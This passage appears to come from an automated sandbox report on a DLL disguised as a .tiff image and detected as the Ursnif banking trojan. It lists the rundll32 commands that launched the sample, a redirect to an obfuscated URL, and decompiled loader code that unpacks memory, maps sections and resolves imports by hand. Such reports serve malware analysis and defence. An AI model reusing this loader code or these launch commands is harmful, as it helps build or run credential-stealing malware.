May 11, 2021 11:12:44.792617083 CEST	1262	IN	HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Pragma: no-cache Location: https://outlook.com/login/greed/gx9NI4Ybpp/8F85m84ndjn4UwJSZ/KFY_2BxmUPMy/coa0QUktAbb/vjBaicl7yvyNDs/NaAVAq9mPnbNTlKz1AUy2/5aIKWQiZNRBNaijS/Tt5Vo5dnaNIMeJI/Piqfb55cpfCEI8CpHK/_2FWICMIW/YUkQnOfGVld1SPd1rTnm/w0s_2F9NNcplFjkZ_2F/ufX9zF863VCJiOMFbmL1SV/K4t8NhPa8Lg/cl7PdmL.gfk Server: Microsoft-IIS/10.0 request-id: 4ac60139-0bd7-4775-a037-e7043fcc077c X-FEServer: MWHPR11CA0031 X-RequestId: 7ab3053c-dc2b-4421-bab2-11ad718bac2f X-Powered-By: ASP.NET X-FEServer: MWHPR11CA0031 Date: Tue, 11 May 2021 09:12:44 GMT Connection: close Content-Length: 0

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6660 Parent PID: 5840

General

Start time:	11:10:12
Start date:	11/05/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll'
Imagebase:	0xe70000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.662417377.0000000003EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.724251151.0000000003EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.662378098.0000000003EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.662456772.0000000003EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.662317153.0000000003EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.662182472.0000000003EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.662498468.0000000003EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.662484640.0000000003EA8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.662019943.0000000003EA8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6672 Parent PID: 6660

General

Start time:	11:10:12
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6688 Parent PID: 6660

General

Start time:	11:10:12
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Hundredpopulate@@8
Imagebase:	0xa40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6700 Parent PID: 6672

General

Start time:	11:10:12
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\609a460e94791.tiff.dll',#1
Imagebase:	0xa40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.681209868.0000000005148000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.681069818.0000000005148000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.681166678.0000000005148000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.681184112.0000000005148000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.681198469.0000000005148000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.681099453.0000000005148000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.681146524.0000000005148000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.681124435.0000000005148000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.725706595.0000000005148000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6736 Parent PID: 6660

General

Start time:	11:10:16
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Mark@@12
Imagebase:	0xa40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6760 Parent PID: 6660

General

Start time:	11:10:20
Start date:	11/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\609a460e94791.tiff.dll,Seefit@@8
Imagebase:	0xa40000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5436 Parent PID: 792

General

Start time:	11:12:42
Start date:	11/05/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff721e20000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5924 Parent PID: 5436

General

Start time:	11:12:43
Start date:	11/05/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5436 CREDAT:17410 /prefetch:2
Imagebase:	0x3e0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6660 Parent PID: 5840 loaddll32.exeCOMMON

Executed Functions

Function 6E23C536, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000009EF,00003000,00000040,000009EF,-_^), ref: 6E23C5F0
VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040,6E23BFEF), ref: 6E23C627
VirtualAlloc.KERNEL32(00000000,00016DD9,00003000,00000040), ref: 6E23C687
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E23C6BD
VirtualProtect.KERNEL32(6E170000,00000000,00000004,6E23C515), ref: 6E23C7C2
VirtualProtect.KERNEL32(6E170000,00001000,00000004,6E23C515), ref: 6E23C7E9
VirtualProtect.KERNEL32(00000000,?,00000002,6E23C515), ref: 6E23C8B6
VirtualProtect.KERNEL32(00000000,?,00000002,6E23C515,?), ref: 6E23C90C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E23C928

Strings

-_^, xrefs: 6E23C5E4

Memory Dump Source

Source File: 00000001.00000002.728091085.000000006E23B000.00000040.00020000.sdmp, Offset: 6E23B000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID: -_^
API String ID: 2574235972-2116301257
Opcode ID: 5ccb745bd81504e9af754416eac276dfbf2b8732d61062dd7648f31a585e0766
Instruction ID: 3f16c60fbffdef4aeac1cf3f09260ba4f21cb1ee3a25b91a97aaee861e579c71
Opcode Fuzzy Hash: 5ccb745bd81504e9af754416eac276dfbf2b8732d61062dd7648f31a585e0766
Instruction Fuzzy Hash: 7DD189B6A20651DFDB108F54CC91B613BA7FF48B10B1A2196ED0A9F39ED371E8118B64

Uniqueness

Uniqueness Score: -1.00%

Function 6E171237, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E171237(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E171CDD();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6E1710E8(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E17179C(E6E171424,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E171BE5(_t44,  &_a4) != 0) {
					 *0x6e174138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x6e174138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E171CC8(_t48 + _t14);
				 *0x6e174138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E6E17133D(_t43);
				goto L11;
			}

0x6e17123e
0x6e171245
0x6e17124a
0x6e17133a
0x6e17133a
0x6e171251
0x6e171255
0x6e17125b
0x6e171269
0x6e17126a
0x6e17126d
0x6e171270
0x6e171279
0x6e17127c
0x6e171282
0x6e171285
0x6e17128c
0x6e171337
0x00000000
0x6e171337
0x6e171296
0x6e1712e7
0x6e1712e7
0x6e1712fd
0x6e171302
0x6e17132a
0x6e171304
0x6e171307
0x6e17130d
0x6e171312
0x6e171319
0x6e171319
0x6e171320
0x6e171320
0x6e17132d
0x6e171333
0x6e171335
0x6e171335
0x00000000
0x6e171333
0x6e1712a3
0x6e1712e1
0x00000000
0x6e1712e1
0x6e1712a5
0x6e1712a8
0x6e1712b1
0x6e1712b3
0x6e1712b7
0x6e1712d9
0x6e1712d9
0x00000000
0x6e1712d9
0x6e1712b9
0x6e1712be
0x6e1712c3
0x6e1712ca
0x00000000
0x00000000
0x6e1712cf
0x6e1712d2
0x00000000

APIs

Part of subcall function 6E171CDD: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E171243,747863F0), ref: 6E171CEC
Part of subcall function 6E171CDD: GetVersion.KERNEL32 ref: 6E171CFB
Part of subcall function 6E171CDD: GetCurrentProcessId.KERNEL32 ref: 6E171D17
Part of subcall function 6E171CDD: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E171D30

GetSystemTime.KERNEL32(?,00000000,747863F0), ref: 6E171255
SwitchToThread.KERNEL32 ref: 6E17125B

Part of subcall function 6E1710E8: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E17113E
Part of subcall function 6E1710E8: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E171204

Sleep.KERNELBASE(00000000,00000000), ref: 6E17127C
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1712B1
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1712CF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E171307
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E171319
CloseHandle.KERNEL32(00000000), ref: 6E171320
GetLastError.KERNEL32(?,00000000), ref: 6E171328
GetLastError.KERNEL32 ref: 6E171335

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: 37efba36aa1d55e3b3f9f45ee07ca6807461015ce9280c96c5ba91b99e2fa907
Instruction ID: 485dfa78a5497efbfbb2656a6e1174c0d98d02928ef3a23df4bb6dfbddb3bf47
Opcode Fuzzy Hash: 37efba36aa1d55e3b3f9f45ee07ca6807461015ce9280c96c5ba91b99e2fa907
Instruction Fuzzy Hash: 6031C875A04625ABCF20EBF58C989DE76BCDF5AB20B314511E911E3240E730D989FB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1715F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1715F1(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E171F14(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6e1715fa
0x6e171601
0x6e171602
0x6e171603
0x6e171604
0x6e171605
0x6e171616
0x6e17161a
0x6e17162e
0x6e171631
0x6e171634
0x6e17163b
0x6e17163e
0x6e171645
0x6e171648
0x6e17164b
0x6e17164e
0x6e171653
0x6e17168e
0x6e171655
0x6e171658
0x6e17165e
0x6e171663
0x6e171667
0x6e171685
0x6e171669
0x6e171670
0x6e17167e
0x6e17167e
0x6e171667
0x6e171696

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,?), ref: 6E17164E

Part of subcall function 6E171F14: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E171663,00000002,00000000,?,?,00000000,?,?,6E171663,00000002), ref: 6E171F41

memset.NTDLL ref: 6E171670

Strings

@, xrefs: 6E17163E

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
Instruction ID: 9862bf3335ef98287fbeb599ed229d6d702a93e7050cebd0bd154b2954c8301a
Opcode Fuzzy Hash: 39e720e2c94793e4bf624767ebfb882cd87e7a4b170212c2c62006b4db7c7316
Instruction Fuzzy Hash: 95210BB1E00209AFDB11DFE9C8849DEFBB9EB48354F108429E515F3210D770AA489B64

Uniqueness

Uniqueness Score: -1.00%

Function 6E1717FA, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1717FA(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x6e174140;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x63699bc3;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x63699b44;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x63699bc3;
										}
										 *_v16 = _t55;
										_t58 = 0x725990f8 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x9c9664bb;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x6e1717fa
0x6e171803
0x6e171808
0x6e17180e
0x6e171817
0x6e17181d
0x6e17181f
0x6e171822
0x6e171827
0x6e17182e
0x6e17182e
0x6e171832
0x6e171838
0x6e17183d
0x00000000
0x00000000
0x6e171843
0x6e17184d
0x6e17184f
0x6e171852
0x6e171855
0x6e171859
0x6e171861
0x6e171863
0x6e171866
0x6e1718ce
0x6e1718ce
0x6e1718d2
0x00000000
0x00000000
0x6e17186b
0x6e171871
0x6e171873
0x6e171886
0x6e171889
0x6e171889
0x6e171889
0x6e17188d
0x6e171875
0x6e171875
0x6e17187d
0x6e17187f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e17187f
0x6e17186d
0x6e17186d
0x6e171881
0x6e171881
0x6e171881
0x6e171890
0x6e171893
0x6e171895
0x6e17189c
0x6e171897
0x6e171897
0x6e171897
0x6e1718a4
0x6e1718aa
0x6e1718ac
0x6e1718dc
0x6e1718ae
0x6e1718ae
0x6e1718b1
0x6e1718b3
0x6e1718bb
0x6e1718bb
0x6e1718c0
0x6e1718c2
0x6e1718c9
0x6e1718cb
0x6e1718cb
0x6e1718cb
0x00000000
0x6e1718cb
0x00000000
0x6e1718ac
0x6e17185b
0x6e17185b
0x6e17185f
0x00000000
0x00000000
0x6e17185f
0x6e1718df
0x6e1718df
0x6e1718e6
0x6e1718eb
0x00000000
0x00000000
0x6e1718f1
0x6e1718fc
0x00000000
0x6e1718fc
0x6e1718f3
0x6e1718f3
0x6e1718f9
0x00000000
0x6e1718f9
0x6e171827
0x6e1718fd
0x6e171902

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E171832
GetProcAddress.KERNEL32(?,00000000), ref: 6E1718A4

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: 30a64dc859c57dd05d348da64cead0404f5d3971e09bc8234e2819d52e22e6a3
Instruction ID: 31924e96d55d58588eed60c5b070436e4727cc06782ed60692af2898f0499975
Opcode Fuzzy Hash: 30a64dc859c57dd05d348da64cead0404f5d3971e09bc8234e2819d52e22e6a3
Instruction Fuzzy Hash: 48312A75F102069FDF64CF99C8A0AAEB7F9BF15B14B2040A9D911E7240E770DAC9EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E171F14, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E171F14(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x6e171f26
0x6e171f2c
0x6e171f3a
0x6e171f41
0x6e171f46
0x6e171f4c
0x00000000
0x6e171f4d
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6E171663,00000002,00000000,?,?,00000000,?,?,6E171663,00000002), ref: 6E171F41

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 84d2ddcb71b9294815acb7440e9f79778740d11ddf7e19adf3d1c5e25ba242e5
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 9DF012B5A0420CBFEB119FA5CC85CDFBBBDEB44394B104979F552E1090D7309E4C9A60

Uniqueness

Uniqueness Score: -1.00%

Function 6E171352, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E171352(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E172130();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e174144;
				_push(_t15 + 0x6e17505e);
				_push(_t15 + 0x6e175054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E17212A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e174148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6e171352
0x6e17135b
0x6e17135f
0x6e171365
0x6e17136a
0x6e17136f
0x6e171372
0x6e171375
0x6e17137a
0x6e17137b
0x6e17137e
0x6e171389
0x6e171390
0x6e171394
0x6e171396
0x6e171397
0x6e17139a
0x6e17139f
0x6e1713a9
0x6e1713ab
0x6e1713ab
0x6e1713bf
0x6e1713c5
0x6e1713c9
0x6e171419
0x6e1713cb
0x6e1713d4
0x6e1713ea
0x6e1713f2
0x6e171404
0x6e171408
0x00000000
0x00000000
0x6e1713f4
0x6e1713f7
0x6e1713fc
0x6e1713fe
0x6e1713fe
0x6e1713df
0x6e1713e1
0x6e17140a
0x6e17140b
0x6e17140b
0x6e1713d4
0x6e171421

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E17135F
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E171375
_snwprintf.NTDLL ref: 6E17139A
CreateFileMappingW.KERNELBASE(000000FF,6E174148,00000004,00000000,?,?), ref: 6E1713BF
GetLastError.KERNEL32 ref: 6E1713D6
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E1713EA
GetLastError.KERNEL32 ref: 6E171402
CloseHandle.KERNEL32(00000000), ref: 6E17140B
GetLastError.KERNEL32 ref: 6E171413

Strings

`RxtAxt, xrefs: 6E17135F

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: `RxtAxt
API String ID: 1724014008-1376811538
Opcode ID: 9a56f4c1b1dcb1688552e68bd8326c29efb8aa507bf3402e5ec4f2c41fb77d0d
